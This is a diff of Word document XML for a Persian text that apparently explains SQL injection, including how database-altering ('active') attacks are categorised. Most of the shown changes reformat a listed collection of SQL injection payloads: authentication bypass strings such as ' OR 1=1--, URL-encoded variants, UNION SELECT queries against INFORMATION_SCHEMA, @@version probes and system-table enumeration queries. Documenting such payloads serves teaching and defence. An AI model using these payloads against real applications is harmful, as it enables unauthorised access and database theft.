+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> تغ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>یی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اطلاعات پا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
         <w:t>گاه</w:t>
       </w:r>
       <w:r>
@@ -38930,7 +37162,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> داده</w:t>
+        <w:t xml:space="preserve"> داده (فعال)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38940,156 +37172,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>قرار گرفتن</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (غ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>رفعال</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ا</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> تغ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>یی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ر</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> اطلاعات پا</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ی</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>گاه</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> داده (فعال)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
         <w:t>،</w:t>
       </w:r>
       <w:r>
@@ -39100,17 +37182,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>به دو دسته ز</w:t>
+        <w:t xml:space="preserve"> به دو دسته ز</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -39577,121 +37649,120 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>'|</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t xml:space="preserve">'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>|(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>elt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">||6 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>(-3+5,bin(15),</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>ord</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">'||'6 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(10),hex(char(45)))) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(||6) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">||6 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 1=1--  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'||'6 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">OR 1=1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(||6) </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR '1'='1 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 1=1--  </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">; OR '1'='1' </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39707,7 +37778,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">OR 1=1 </w:t>
+        <w:t xml:space="preserve">%22+or+isnull%281%2F0%29+%2F* </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -39718,50 +37789,617 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>' OR</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t xml:space="preserve">%27+OR+%277659%27%3D%277659 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> '1'='1 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%22+or+isnull%281%2F0%29+%2F* </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; OR '1'='1' </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">%27+--+ </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' or 1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>" or 1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' or 1=1 /* </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">or 1=1-- ' or 'a'='a " or "a"="a </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">') or ('a'='a </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Admin' OR ' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' having 1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' having 1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' group by userid having 1=1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')- </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' or 1 in (select @@version)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>' union all select @@version</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'unusual' = 'unusual' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'something' = 'some'+'thing' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'text' = N'text' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' OR 'something' like 'some%' </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
